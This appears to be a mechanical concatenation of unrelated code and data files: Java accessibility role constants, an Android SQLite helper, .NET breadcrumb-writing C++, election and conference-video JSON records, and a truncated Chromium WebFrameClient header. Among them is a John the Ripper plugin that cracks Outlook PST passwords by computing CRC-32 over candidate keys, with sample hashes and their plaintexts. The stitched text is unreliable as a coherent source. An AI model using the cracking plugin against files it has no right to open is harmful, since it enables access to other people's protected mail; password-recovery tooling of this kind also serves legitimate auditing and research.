new AccessibleRole("scrollbar"); /** * An object usually used in a scroll pane. It represents the portion of the * entire data that the user can see. As the user manipulates the scroll * bars, the contents of the viewport can change. * * @see #SCROLL_PANE */ public static final AccessibleRole VIEWPORT = new AccessibleRole("viewport"); /** * An object that allows the user to select from a bounded range. For * example, a slider might be used to select a number between 0 and 100. */ public static final AccessibleRole SLIDER = new AccessibleRole("slider"); /** * A specialized panel that presents two other panels at the same time. * Between the two panels is a divider the user can manipulate to make one * panel larger and the other panel smaller. */ public static final AccessibleRole SPLIT_PANE = new AccessibleRole("splitpane"); /** * An object used to present information in terms of rows and columns. An * example might include a spreadsheet application. */ public static final AccessibleRole TABLE = new AccessibleRole("table"); /** * An object that presents text to the user. The text is usually editable by * the user as opposed to a label. * * @see #LABEL */ public static final AccessibleRole TEXT = new AccessibleRole("text"); /** * An object used to present hierarchical information to the user. The * individual nodes in the tree can be collapsed and expanded to provide * selective disclosure of the tree's contents. */ public static final AccessibleRole TREE = new AccessibleRole("tree"); /** * A bar or palette usually composed of push buttons or toggle buttons. It * is often used to provide the most frequently used functions for an * application. */ public static final AccessibleRole TOOL_BAR = new AccessibleRole("toolbar"); /** * An object that provides information about another object. The * {@code accessibleDescription} property of the tool tip is often displayed * to the user in a small "help bubble" when the user causes the mouse to * hover over the object associated with the tool tip. */ public static final AccessibleRole TOOL_TIP = new AccessibleRole("tooltip"); /** * An AWT component, but nothing else is known about it. * * @see #SWING_COMPONENT * @see #UNKNOWN */ public static final AccessibleRole AWT_COMPONENT = new AccessibleRole("awtcomponent"); /** * A Swing component, but nothing else is known about it. * * @see #AWT_COMPONENT * @see #UNKNOWN */ public static final AccessibleRole SWING_COMPONENT = new AccessibleRole("swingcomponent"); /** * The object contains some {@code Accessible} information, but its role is * not known. * * @see #AWT_COMPONENT * @see #SWING_COMPONENT */ public static final AccessibleRole UNKNOWN = new AccessibleRole("unknown"); /** * A {@code STATUS_BAR} is an simple component that can contain multiple * labels of status information to the user. */ public static final AccessibleRole STATUS_BAR = new AccessibleRole("statusbar"); /** * A {@code DATE_EDITOR} is a component that allows users to edit * {@code java.util.Date} and {@code java.util.Time} objects. */ public static final AccessibleRole DATE_EDITOR = new AccessibleRole("dateeditor"); /** * A {@code SPIN_BOX} is a simple spinner component and its main use is for * simple numbers. */ public static final AccessibleRole SPIN_BOX = new AccessibleRole("spinbox"); /** * A {@code FONT_CHOOSER} is a component that lets the user pick various * attributes for fonts. */ public static final AccessibleRole FONT_CHOOSER = new AccessibleRole("fontchooser"); /** * A {@code GROUP_BOX} is a simple container that contains a border around * it and contains components inside it. */ public static final AccessibleRole GROUP_BOX = new AccessibleRole("groupbox"); /** * A text header. * * @since 1.5 */ public static final AccessibleRole HEADER = new AccessibleRole("header"); /** * A text footer. * * @since 1.5 */ public static final AccessibleRole FOOTER = new AccessibleRole("footer"); /** * A text paragraph. * * @since 1.5 */ public static final AccessibleRole PARAGRAPH = new AccessibleRole("paragraph"); /** * A ruler is an object used to measure distance. * * @since 1.5 */ public static final AccessibleRole RULER = new AccessibleRole("ruler"); /** * A role indicating the object acts as a formula for calculating a value. * An example is a formula in a spreadsheet cell. * * @since 1.5 */ public static final AccessibleRole EDITBAR = new AccessibleRole("editbar"); /** * A role indicating the object monitors the progress of some operation. * * @since 1.5 */ public static final AccessibleRole PROGRESS_MONITOR = new AccessibleRole("progressMonitor"); // The following are all under consideration for potential future use. // public static final AccessibleRole APPLICATION // = new AccessibleRole("application"); // public static final AccessibleRole BORDER // = new AccessibleRole("border"); // public static final AccessibleRole CHECK_BOX_MENU_ITEM // = new AccessibleRole("checkboxmenuitem"); // public static final AccessibleRole CHOICE // = new AccessibleRole("choice"); // public static final AccessibleRole COLUMN // = new AccessibleRole("column"); // public static final AccessibleRole CURSOR // = new AccessibleRole("cursor"); // public static final AccessibleRole DOCUMENT // = new AccessibleRole("document"); // public static final AccessibleRole IMAGE // = new AccessibleRole("Image"); // public static final AccessibleRole INDICATOR // = new AccessibleRole("indicator"); // public static final AccessibleRole RADIO_BUTTON_MENU_ITEM // = new AccessibleRole("radiobuttonmenuitem"); // public static final AccessibleRole ROW // = new AccessibleRole("row"); // public static final AccessibleRole TABLE_CELL // = new AccessibleRole("tablecell"); // public static final AccessibleRole TREE_NODE // = new AccessibleRole("treenode"); /** * Creates a new {@code AccessibleRole} using the given locale independent * key. This should not be a public method. Instead, it is used to create * the constants in this file to make it a strongly typed enumeration. * Subclasses of this class should enforce similar policy. * <p> * The key {@code String} should be a locale independent key for the role. * It is not intended to be used as the actual {@code String} to display to * the user. To get the localized string, use {@link #toDisplayString()}. * * @param key the locale independent name of the role * @see AccessibleBundle#toDisplayString */ protected AccessibleRole(String key) { this.key = key; } }
7,961
879
<gh_stars>100-1000 package com.cundong.izhihu.db; import android.content.Context; import android.database.sqlite.SQLiteDatabase; import android.database.sqlite.SQLiteOpenHelper; public final class DatabaseHelper extends SQLiteOpenHelper { //db public static final String DB_NAME = "news_paper.db"; public static final int DB_VERSION = 7; //1.news_list //store news list and news detail public static final String NEWS_TABLE_NAME = "news_list"; public static final String NEWS_COLUMN_ID = "_id"; public static final String NEWS_COLUMN_TYPE = "type"; public static final String NEWS_COLUMN_KEY = "key"; public static final String NEWS_COLUMN_CONTENT = "content"; private static final String NEWS_TABLE_CREATE = "CREATE TABLE " + NEWS_TABLE_NAME + "(" + NEWS_COLUMN_ID + " INTEGER PRIMARY KEY AUTOINCREMENT, " + NEWS_COLUMN_TYPE + " INTEGER NOT NULL, " + NEWS_COLUMN_KEY + " CHAR(256) UNIQUE NOT NULL, " + NEWS_COLUMN_CONTENT + " TEXT NOT NULL);"; //2.news_read public static final String READ_TABLE_NAME = "news_read"; public static final String READ_COLUMN_ID = "_id"; public static final String READ_COLUMN_NEWSID = "news_id"; private static final String READ_TABLE_CREATE = "CREATE TABLE " + READ_TABLE_NAME + "(" + READ_COLUMN_ID + " INTEGER PRIMARY KEY AUTOINCREMENT, " + READ_COLUMN_NEWSID + " CHAR(256) UNIQUE);"; //3.news_favorite public static final String FAVORITE_TABLE_NAME = "news_favorite"; public static final String FAVORITE_COLUMN_ID = "_id"; public static final String FAVORITE_COLUMN_NEWS_ID = "news_id"; public static final String FAVORITE_COLUMN_NEWS_TITLE = "news_title"; public static final String FAVORITE_COLUMN_NEWS_LOGO = "news_logo"; public static final String FAVORITE_COLUMN_NEWS_SHARE_URL = "news_share_url"; private static final String FAVORITE_TABLE_CREATE = "CREATE TABLE " + FAVORITE_TABLE_NAME + "(" + FAVORITE_COLUMN_ID + " INTEGER PRIMARY KEY AUTOINCREMENT, " + FAVORITE_COLUMN_NEWS_ID + " CHAR(256) UNIQUE, " + FAVORITE_COLUMN_NEWS_TITLE + " CHAR(1024), " + FAVORITE_COLUMN_NEWS_LOGO + " CHAR(1024), " + FAVORITE_COLUMN_NEWS_SHARE_URL + " CHAR(1024));"; private volatile static DatabaseHelper mDBHelper; private DatabaseHelper(Context context) { super(context, DB_NAME, null, DB_VERSION); } public static synchronized DatabaseHelper getInstance(Context context) { if (mDBHelper == null) { synchronized (DatabaseHelper.class) { if (mDBHelper == null) { mDBHelper = new DatabaseHelper(context); } } } return mDBHelper; } @Override public void onCreate(SQLiteDatabase db) { db.execSQL(NEWS_TABLE_CREATE); db.execSQL(READ_TABLE_CREATE); db.execSQL(FAVORITE_TABLE_CREATE); } @Override public void onUpgrade(SQLiteDatabase db, int oldVersion, int newVersion) { db.execSQL("DROP TABLE IF EXISTS " + NEWS_TABLE_NAME); db.execSQL("DROP TABLE IF EXISTS " + READ_TABLE_NAME); db.execSQL("DROP TABLE IF EXISTS " + FAVORITE_TABLE_NAME); onCreate(db); } }
1,128
9,402
<reponame>pyracanda/runtime // Licensed to the .NET Foundation under one or more agreements. // The .NET Foundation licenses this file to you under the MIT license. #include <thread> #include <pal.h> #include <utils.h> #include <trace.h> #include "breadcrumbs.h" breadcrumb_writer_t::breadcrumb_writer_t(std::unordered_set<pal::string_t> &files) { assert(m_files.empty()); m_files.swap(files); assert(files.empty()); if (!pal::get_default_breadcrumb_store(&m_breadcrumb_store)) { m_breadcrumb_store.clear(); } } // Begin breadcrumb writing: launch a thread to write breadcrumbs. std::shared_ptr<breadcrumb_writer_t> breadcrumb_writer_t::begin_write(std::unordered_set<pal::string_t> &files) { trace::verbose(_X("--- Begin breadcrumb write")); auto instance = std::make_shared<breadcrumb_writer_t>(files); if (instance->m_breadcrumb_store.empty()) { trace::verbose(_X("Breadcrumb store was not obtained... skipping write.")); return nullptr; } // Add a reference to this object for the thread we will spawn instance->m_threads_instance = instance; instance->m_thread = std::thread(write_worker_callback, instance.get()); trace::verbose(_X("Breadcrumbs will be written using a background thread")); return instance; } // Write the breadcrumbs. This method should be called // only from the background thread. void breadcrumb_writer_t::write_callback() { bool successful = true; for (const auto& file : m_files) { pal::string_t file_path = m_breadcrumb_store; pal::string_t file_name = _X("netcore,") + file; append_path(&file_path, file_name.c_str()); if (!pal::file_exists(file_path)) { if (!pal::touch_file(file_path)) { successful = false; } } } trace::verbose(_X("--- End breadcrumb write %d"), successful); // Clear reference to this object for the thread. m_threads_instance.reset(); } // ThreadProc for the background writer. void breadcrumb_writer_t::write_worker_callback(breadcrumb_writer_t* p_this) { assert(p_this); assert(p_this->m_threads_instance); assert(p_this->m_threads_instance.get() == p_this); try { trace::verbose(_X("Breadcrumb thread write callback...")); p_this->write_callback(); } catch (...) { trace::warning(_X("An unexpected exception was thrown while leaving breadcrumbs")); } } // Wait for completion of the background tasks, if any. void breadcrumb_writer_t::end_write() { if (m_thread.joinable()) { trace::verbose(_X("Waiting for breadcrumb thread to exit...")); // Block on the thread to exit. m_thread.join(); } trace::verbose(_X("Done waiting for breadcrumb thread to exit...")); }
1,105
2,109
/* PST cracker patch for JtR. Hacked together during July of 2012 by * <NAME> <<EMAIL> at <EMAIL>> * * Optimizations and shift to pkzip CRC32 code done by JimF * * This software is Copyright (c) 2012, <NAME> <dhiru.kholia at gmail.com> * and it is hereby released to the general public under the following terms: * Redistribution and use in source and binary forms, with or without * modification, are permitted. * * Uses code from crc32_fmt_plug.c written by JimF */ #if FMT_EXTERNS_H extern struct fmt_main fmt_pst; #elif FMT_REGISTERS_H john_register_one(&fmt_pst); #else #include <string.h> #include "arch.h" #include "misc.h" #include "common.h" #include "formats.h" #include "crc32.h" #if !FAST_FORMATS_OMP #undef _OPENMP #endif #ifdef _OPENMP #include <omp.h> #ifdef __MIC__ #ifndef OMP_SCALE #define OMP_SCALE 1024 #endif #else #ifndef OMP_SCALE #define OMP_SCALE 16384 // core i7 no HT #endif #endif static int omp_t = 1; #endif #include "memdbg.h" #define FORMAT_LABEL "PST" #define FORMAT_NAME "custom CRC-32" #define FORMAT_TAG "$pst$" #define FORMAT_TAG_LEN (sizeof(FORMAT_TAG)-1) #define ALGORITHM_NAME "32/" ARCH_BITS_STR #define BENCHMARK_COMMENT "" #define BENCHMARK_LENGTH -1 #define PLAINTEXT_LENGTH 8 #define BINARY_SIZE 4 #define SALT_SIZE 0 #define BINARY_ALIGN sizeof(uint32_t) #define SALT_ALIGN 1 #define MIN_KEYS_PER_CRYPT 1 #define MAX_KEYS_PER_CRYPT 256 static struct fmt_tests tests[] = { {"$pst$a9290513", "openwall"}, /* "jfuck jw" works too ;) */ {"$pst$50e099bc", "password"}, {"$pst$00000000", ""}, {"$pst$e3da3318", "xxx"}, {"$pst$a655dd18", "XYz123"}, {"$pst$29b14070", "thisisalongstring"}, {"$pst$25b44615", "string with space"}, {NULL} }; static char (*saved_key)[PLAINTEXT_LENGTH + 1]; static uint32_t (*crypt_out); static void init(struct fmt_main *self) { #if defined (_OPENMP) omp_t = omp_get_max_threads(); self->params.min_keys_per_crypt *= omp_t; omp_t *= OMP_SCALE; self->params.max_keys_per_crypt *= omp_t; #endif saved_key = mem_calloc(self->params.max_keys_per_crypt, sizeof(*saved_key)); crypt_out = mem_calloc(self->params.max_keys_per_crypt, sizeof(*crypt_out)); } static void done(void) { MEM_FREE(crypt_out); MEM_FREE(saved_key); } static int valid(char *ciphertext, struct fmt_main *self) { char *p; int extra; if (strncmp(ciphertext, FORMAT_TAG, FORMAT_TAG_LEN)) return 0; p = ciphertext + FORMAT_TAG_LEN; if (hexlenl(p, &extra) != BINARY_SIZE * 2 || extra) return 0; return 1; } static void set_key(char *key, int index) { strnzcpy(saved_key[index], key, PLAINTEXT_LENGTH+1); } static int cmp_all(void *binary, int count) { uint32_t crc=*((uint32_t*)binary), i; for (i = 0; i < count; ++i) if (crc == crypt_out[i]) return 1; return 0; } static int cmp_one(void *binary, int index) { return *((uint32_t*)binary) == crypt_out[index]; } static int cmp_exact(char *source, int index) { return 1; } static int crypt_all(int *pcount, struct db_salt *salt) { const int count = *pcount; int i; #ifdef _OPENMP #pragma omp parallel for private(i) #endif for (i = 0; i < count; ++i) { CRC32_t crc = 0; unsigned char *p = (unsigned char*)saved_key[i]; while (*p) crc = jtr_crc32(crc, *p++); crypt_out[i] = crc; } return count; } static void *get_binary(char *ciphertext) { static uint32_t *out; if (!out) out = mem_alloc_tiny(sizeof(uint32_t), MEM_ALIGN_WORD); sscanf(&ciphertext[5], "%x", out); return out; } static char *get_key(int index) { return saved_key[index]; } static int get_hash_0(int index) { return crypt_out[index] & PH_MASK_0; } static int get_hash_1(int index) { return crypt_out[index] & PH_MASK_1; } static int get_hash_2(int index) { return crypt_out[index] & PH_MASK_2; } static int get_hash_3(int index) { return crypt_out[index] & PH_MASK_3; } static int get_hash_4(int index) { return crypt_out[index] & PH_MASK_4; } static int get_hash_5(int index) { return crypt_out[index] & PH_MASK_5; } static int get_hash_6(int index) { return crypt_out[index] & PH_MASK_6; } struct fmt_main fmt_pst = { { FORMAT_LABEL, FORMAT_NAME, ALGORITHM_NAME, BENCHMARK_COMMENT, BENCHMARK_LENGTH, 0, PLAINTEXT_LENGTH, BINARY_SIZE, BINARY_ALIGN, SALT_SIZE, SALT_ALIGN, MIN_KEYS_PER_CRYPT, MAX_KEYS_PER_CRYPT, #ifdef _OPENMP FMT_OMP | FMT_OMP_BAD | #endif FMT_CASE | FMT_TRUNC | FMT_8_BIT | FMT_NOT_EXACT, { NULL }, { FORMAT_TAG }, tests }, { init, done, fmt_default_reset, fmt_default_prepare, valid, fmt_default_split, get_binary, fmt_default_salt, { NULL }, fmt_default_source, { fmt_default_binary_hash_0, fmt_default_binary_hash_1, fmt_default_binary_hash_2, fmt_default_binary_hash_3, fmt_default_binary_hash_4, fmt_default_binary_hash_5, fmt_default_binary_hash_6 }, fmt_default_salt_hash, NULL, fmt_default_set_salt, set_key, get_key, fmt_default_clear_keys, crypt_all, { get_hash_0, get_hash_1, get_hash_2, get_hash_3, get_hash_4, get_hash_5, get_hash_6 }, cmp_all, cmp_one, cmp_exact } }; #endif /* plugin stanza */
2,419
348
{"nom":"Saint-Laurent-de-Carnols","circ":"4ème circonscription","dpt":"Gard","inscrits":392,"abs":224,"votants":168,"blancs":20,"nuls":2,"exp":146,"res":[{"nuance":"REM","nom":"Mme <NAME>","voix":84},{"nuance":"FN","nom":"<NAME>","voix":62}]}
98
435
<reponame>amaajemyfren/data<filename>pycon-ar-2011/videos/pyconar-2011-alan-runyan-plone-pyar.json { "description": "<NAME> y su charla en el auditorio principal de PyConAr 2011 sobre el gestor de contenidos Plone. La conferencia tuvo lugar en la ciudad de Jun\u00edn ( Buenos Aires, Argentina ) en Septiembre de 2011, y fu\u00e9 organizada por PyAr ( Python Argentina ).", "language": "eng", "recorded": "2011-09-23", "speakers": [ "<NAME>" ], "thumbnail_url": "https://i.ytimg.com/vi/TNnU2oqPxUI/hqdefault.jpg", "title": "Plone", "videos": [ { "type": "youtube", "url": "https://www.youtube.com/watch?v=TNnU2oqPxUI" } ] }
280
777
/* * Copyright (C) 2011, 2012 Google Inc. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions are * met: * * * Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * * Redistributions in binary form must reproduce the above * copyright notice, this list of conditions and the following disclaimer * in the documentation and/or other materials provided with the * distribution. * * Neither the name of Google Inc. nor the names of its * contributors may be used to endorse or promote products derived from * this software without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR * A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT * OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT * LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ #ifndef WebFrameClient_h #define WebFrameClient_h #include "../platform/WebColor.h" #include "WebAXObject.h" #include "WebDOMMessageEvent.h" #include "WebDataSource.h" #include "WebFileChooserParams.h" #include "WebFormElement.h" #include "WebFrame.h" #include "WebFrameOwnerProperties.h" #include "WebHistoryCommitType.h" #include "WebHistoryItem.h" #include "WebIconURL.h" #include "WebNavigationPolicy.h" #include "WebNavigationType.h" #include "WebNavigatorContentUtilsClient.h" #include "WebSandboxFlags.h" #include "WebTextDirection.h" #include "public/platform/BlameContext.h" #include "public/platform/WebCommon.h" #include "public/platform/WebEffectiveConnectionType.h" #include "public/platform/WebFeaturePolicy.h" #include "public/platform/WebFileSystem.h" #include "public/platform/WebFileSystemType.h" #include "public/platform/WebInsecureRequestPolicy.h" #include "public/platform/WebLoadingBehaviorFlag.h" #include "public/platform/WebPageVisibilityState.h" #include "public/platform/WebSecurityOrigin.h" #include "public/platform/WebSetSinkIdCallbacks.h" #include "public/platform/WebStorageQuotaCallbacks.h" #include "public/platform/WebStorageQuotaType.h" #include "public/platform/WebURLError.h" #include "public/platform/WebURLRequest.h" #include "public/web/WebContentSecurityPolicy.h" #include <v8.h> namespace blink { enum class WebTreeScopeType; class InterfaceProvider; class InterfaceRegistry; class WebApplicationCacheHost; class WebApplicationCacheHostClient; class WebColorChooser; class WebColorChooserClient; class WebContentDecryptionModule; class WebCookieJar; class WebDataSource; class WebEncryptedMediaClient; class WebExternalPopupMenu; class WebExternalPopupMenuClient; class WebFileChooserCompletion; class WebInstalledAppClient; class WebLocalFrame; class WebMediaPlayer; class WebMediaPlayerClient; class WebMediaPlayerEncryptedMediaClient; class WebMediaPlayerSource; class WebMediaSession; class WebServiceWorkerProvider; class WebPlugin; class WebPresentationClient; class WebPushClient; class WebRTCPeerConnectionHandler; class WebScreenOrientationClient; class WebString; class WebURL; class WebURLResponse; class WebUserMediaClient; class WebWorkerContentSettingsClientProxy; struct WebColorSuggestion; struct WebConsoleMessage; struct WebContextMenuData; struct WebPluginParams; struct WebPopupMenuInfo; struct WebRect; struct WebURLError; class BLINK_EXPORT WebFrameClient { public: virtual ~WebFrameClient() {} // Factory methods ----------------------------------------------------- // May return null. virtual WebPlugin* createPlugin(WebLocalFrame*, const WebPluginParams&) { return 0; } // May return null. // WebContentDecryptionModule* may be null if one has not yet been set. virtual WebMediaPlayer* createMediaPlayer(const WebMediaPlayerSource&, WebMediaPlayerClient*, WebMediaPlayerEncryptedMediaClient*, WebContentDecryptionModule*, const WebString& sinkId) { return 0; } // May return null. virtual WebMediaSession* createMediaSession() { return 0; } // May return null. virtual WebApplicationCacheHost* createApplicationCacheHost( WebApplicationCacheHostClient*) { return 0; } // May return null. virtual WebServiceWorkerProvider* createServiceWorkerProvider() { return 0; } // May return null. virtual WebWorkerContentSettingsClientProxy* createWorkerContentSettingsClientProxy() { return 0; } // Create a new WebPopupMenu. In the "createExternalPopupMenu" form, the // client is responsible for rendering the contents of the popup menu. virtual WebExternalPopupMenu* createExternalPopupMenu( const WebPopupMenuInfo&, WebExternalPopupMenuClient*) { return 0; } // Services ------------------------------------------------------------ // A frame specific cookie jar. May return null, in which case // WebKitPlatformSupport::cookieJar() will be called to access cookies. virtual WebCookieJar* cookieJar() { return 0; } // Returns a blame context for attributing work belonging to this frame. virtual BlameContext* frameBlameContext() { return nullptr; } // General notifications ----------------------------------------------- // Indicates if creating a plugin without an associated renderer is supported. virtual bool canCreatePluginWithoutRenderer(const WebString& mimeType) { return false; } // Indicates that another page has accessed the DOM of the initial empty // document of a main frame. After this, it is no longer safe to show a // pending navigation's URL, because a URL spoof is possible. virtual void didAccessInitialDocument() {} // Request the creation of a new child frame. Embedders may return nullptr // to prevent the new child frame from being attached. Otherwise, embedders // should create a new WebLocalFrame, insert it into the frame tree, and // return the created frame. virtual WebLocalFrame* createChildFrame(WebLocalFrame* parent, WebTreeScopeType, const WebString& name, const WebString& uniqueName, WebSandboxFlags sandboxFlags, const WebFrameOwnerProperties&) { return nullptr; } // This frame has set its opener to another frame, or disowned the opener // if opener is null. See http://html.spec.whatwg.org/#dom-opener. virtual void didChangeOpener(WebFrame*) {} // Specifies the reason for the detachment. enum class DetachType { Remove, Swap }; // This frame has been detached. Embedders should release any resources // associated with this frame. If the DetachType is Remove, the frame should // also be removed from the frame tree; otherwise, if the DetachType is // Swap, the frame is being replaced in-place by WebFrame::swap(). virtual void frameDetached(WebLocalFrame*, DetachType); // This frame has become focused. virtual void frameFocused() {} // A provisional load is about to commit. virtual void willCommitProvisionalLoad(WebLocalFrame*) {} // This frame's name has changed. virtual void didChangeName(const WebString& name, const WebString& uniqueName) {} // This frame has set an insecure request policy. virtual void didEnforceInsecureRequestPolicy(WebInsecureRequestPolicy) {} // This frame has been updated to a unique origin, which should be // considered potentially trustworthy if // |isPotentiallyTrustworthyUniqueOrigin| is true. TODO(estark): // this method only exists to support dynamic sandboxing via a CSP // delivered in a <meta> tag. This is not supposed to be allowed per // the CSP spec and should be ripped out. https://crbug.com/594645 virtual void didUpdateToUniqueOrigin( bool isPotentiallyTrustworthyUniqueOrigin) {} // The sandbox flags have changed for a child frame of this frame. virtual void didChangeSandboxFlags(WebFrame* childFrame, WebSandboxFlags flags) {} // Called when a Feature-Policy HTTP header is encountered while loading the // frame's document. virtual void didSetFeaturePolicyHeader( const WebParsedFeaturePolicy& parsedHeader) {} // Called when a new Content Security Policy is added to the frame's // document. This can be triggered by handling of HTTP headers, handling // of <meta> element, or by inheriting CSP from the parent (in case of // about:blank). virtual void didAddContentSecurityPolicy(const WebString& headerValue, WebContentSecurityPolicyType, WebContentSecurityPolicySource) {} // Some frame owner properties have changed for a child frame of this frame. // Frame owner properties currently include: scrolling, marginwidth and // marginheight. virtual void didChangeFrameOwnerProperties(WebFrame* childFrame, const WebFrameOwnerProperties&) {} // Called when a watched CSS selector matches or stops matching. virtual void didMatchCSS( WebLocalFrame*, const WebVector<WebString>& newlyMatchingSelectors, const WebVector<WebString>& stoppedMatchingSelectors) {} // Called the first time this frame is the target of a user gesture. virtual void setHasReceivedUserGesture() {} // Console messages ---------------------------------------------------- // Whether or not we should report a detailed message for the given source. virtual bool shouldReportDetailedMessageForSource(const WebString& source) { return false; } // A new message was added to the console. virtual void didAddMessageToConsole(const WebConsoleMessage&, const WebString& sourceName, unsigned sourceLine, const WebString& stackTrace) {} // Load commands ------------------------------------------------------- // The client should handle the navigation externally. virtual void loadURLExternally(const WebURLRequest&, WebNavigationPolicy, const WebString& downloadName, bool shouldReplaceCurrentEntry) {} // The client should load an error page in the current frame. virtual void loadErrorPage(int reason) {} // Navigational queries ------------------------------------------------ // The client may choose to alter the navigation policy. Otherwise, // defaultPolicy should just be returned. struct NavigationPolicyInfo { WebDataSource::ExtraData* extraData; // Note: if browser side navigations are enabled, the client may modify // the urlRequest. However, should this happen, the client should change // the WebNavigationPolicy to WebNavigationPolicyIgnore, and the load // should stop in blink. In all other cases, the urlRequest should not // be modified. WebURLRequest& urlRequest; WebNavigationType navigationType; WebNavigationPolicy defaultPolicy; bool replacesCurrentHistoryItem; bool isHistoryNavigationInNewChildFrame; bool isClientRedirect; WebFormElement form; bool isCacheDisabled; NavigationPolicyInfo(WebURLRequest& urlRequest) : extraData(nullptr), urlRequest(urlRequest), navigationType(WebNavigationTypeOther), defaultPolicy(WebNavigationPolicyIgnore), replacesCurrentHistoryItem(false), isHistoryNavigationInNewChildFrame(false), isClientRedirect(false), isCacheDisabled(false) {} }; virtual WebNavigationPolicy decidePolicyForNavigation( const NavigationPolicyInfo& info) { return info.defaultPolicy; } // During a history navigation, we may choose to load new subframes from // history as well. This returns such a history item if appropriate. virtual WebHistoryItem historyItemForNewChildFrame() { return WebHistoryItem(); } // Navigational notifications ------------------------------------------ // These notifications bracket any loading that occurs in the WebFrame. virtual void didStartLoading(bool toDifferentDocument) {} virtual void didStopLoading() {} // Notification that some progress was made loading the current frame. // loadProgress is a value between 0 (nothing loaded) and 1.0 (frame fully // loaded). virtual void didChangeLoadProgress(double loadProgress) {} // A form submission has been requested, but the page's submit event handler // hasn't yet had a chance to run (and possibly alter/interrupt the submit.) virtual void willSendSubmitEvent(const WebFormElement&) {} // A form submission is about to occur. virtual void willSubmitForm(const WebFormElement&) {} // A datasource has been created for a new navigation. The given // datasource will become the provisional datasource for the frame. virtual void didCreateDataSource(WebLocalFrame*, WebDataSource*) {} // A new provisional load has been started. virtual void didStartProvisionalLoad(WebLocalFrame* localFrame) {} // The provisional load was redirected via a HTTP 3xx response. virtual void didReceiveServerRedirectForProvisionalLoad(WebLocalFrame*) {} // The provisional load failed. The WebHistoryCommitType is the commit type // that would have been used had the load succeeded. virtual void didFailProvisionalLoad(WebLocalFrame*, const WebURLError&, WebHistoryCommitType) {} // The provisional datasource is now committed. The first part of the // response body has been received, and the encoding of the response // body is known. virtual void didCommitProvisionalLoad(WebLocalFrame*, const WebHistoryItem&, WebHistoryCommitType) {} // The frame's document has just been initialized. virtual void didCreateNewDocument(WebLocalFrame* frame) {} // The window object for the frame has been cleared of any extra // properties that may have been set by script from the previously // loaded document. virtual void didClearWindowObject(WebLocalFrame* frame) {} // The document element has been created. // This method may not invalidate the frame, nor execute JavaScript code. virtual void didCreateDocumentElement(WebLocalFrame*) {} // Like |didCreateDocumentElement|, except this method may run JavaScript // code (and possibly invalidate the frame). virtual void runScriptsAtDocumentElementAvailable(WebLocalFrame*) {} // The page title is available. virtual void didReceiveTitle(WebLocalFrame* frame, const WebString& title, WebTextDirection direction) {} // The icon for the page have changed. virtual void didChangeIcon(WebLocalFrame*, WebIconURL::Type) {} // The frame's document finished loading. // This method may not execute JavaScript code. virtual void didFinishDocumentLoad(WebLocalFrame*) {} // Like |didFinishDocumentLoad|, except this method may run JavaScript // code (and possibly invalidate the frame). virtual void runScriptsAtDocumentReady(WebLocalFrame*, bool documentIsEmpty) { } // The 'load' event was dispatched. virtual void didHandleOnloadEvents(WebLocalFrame*) {} // The frame's document or one of its subresources failed to load. The // WebHistoryCommitType is the commit type that would have been used had the // load succeeded. virtual void didFailLoad(WebLocalFrame*, const WebURLError&, WebHistoryCommitType) {} // The frame's document and all of its subresources succeeded to load. virtual void didFinishLoad(WebLocalFrame*) {} // The navigation resulted in no change to the documents within the page. // For example, the navigation may have just resulted in scrolling to a // named anchor or a PopState event may have been dispatched. virtual void didNavigateWithinPage(WebLocalFrame*, const WebHistoryItem&, WebHistoryCommitType, bool contentInitiated) {} // Called upon update to scroll position, document state, and other // non-navigational events related to the data held by WebHistoryItem. // WARNING: This method may be called very frequently. virtual void didUpdateCurrentHistoryItem() {} // The frame's manifest has changed. virtual void didChangeManifest() {} // The frame's theme color has changed. virtual void didChangeThemeColor() {} // Called to dispatch a load event for this frame in the FrameOwner of an // out-of-process parent frame. virtual void dispatchLoad() {} // Returns the effective connection type when the frame was fetched. virtual WebEffectiveConnectionType getEffectiveConnectionType() { return WebEffectiveConnectionType::TypeUnknown; } // Push API --------------------------------------------------- // Used to access the embedder for the Push API. virtual WebPushClient* pushClient() { return 0; } // Presentation API ---------------------------------------------------- // Used to access the embedder for the Presentation API. virtual WebPresentationClient* presentationClient() { return 0; } // InstalledApp API ---------------------------------------------------- // Used to access the embedder for the InstalledApp API. virtual WebInstalledAppClient* installedAppClient() { return nullptr; } // Editing ------------------------------------------------------------- // These methods allow the client to intercept and overrule editing // operations. virtual void didChangeSelection(bool isSelectionEmpty) {} // This method is called in response to handleInputEvent() when the // default action for the current keyboard event is not suppressed by the // page, to give the embedder a chance to handle the keyboard event // specially. // // Returns true if the keyboard event was handled by the embedder, // indicating that the default action should be suppressed. virtual bool handleCurrentKeyboardEvent() { return false; } // Dialogs ------------------------------------------------------------- // This method opens the color chooser and returns a new WebColorChooser // instance. If there is a WebColorChooser already from the last time this // was called, it ends the color chooser by calling endChooser, and replaces // it with the new one. The given list of suggestions can be used to show a // simple interface with a limited set of choices. virtual WebColorChooser* createColorChooser( WebColorChooserClient*, const WebColor&, const WebVector<WebColorSuggestion>&) { return 0; } // Displays a modal alert dialog containing the given message. Returns // once the user dismisses the dialog. virtual void runModalAlertDialog(const WebString& message) {} // Displays a modal confirmation dialog with the given message as // description and OK/Cancel choices. Returns true if the user selects // 'OK' or false otherwise. virtual bool runModalConfirmDialog(const WebString& message) { return false; } // Displays a modal input dialog with the given message as description // and OK/Cancel choices. The input field is pre-filled with // defaultValue. Returns true if the user selects 'OK' or false // otherwise. Upon returning true, 